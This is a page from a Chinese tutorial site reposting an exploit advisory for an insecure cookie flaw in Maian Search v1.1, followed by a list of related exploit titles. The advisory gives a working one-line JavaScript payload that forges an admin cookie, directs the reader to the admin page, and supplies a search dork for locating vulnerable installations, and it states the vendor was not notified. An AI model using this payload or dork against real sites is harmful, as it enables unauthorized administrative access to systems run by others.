手机
当前位置:查字典教程网 >网络安全 >Exploit >Maian Search
Maian Search
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by: Maian Search v1.1

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Search suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "search_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Search <= v1.1 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Search】相关文章:

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

NoName Script

Maian Weblog

Linux Kernel

Dana IRC 1.4a Remote Buffer Overflow Exploit

Mole Group Real Estate Script

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

Maian Uploader

上一篇: Maian Uploader
精品推荐
分类导航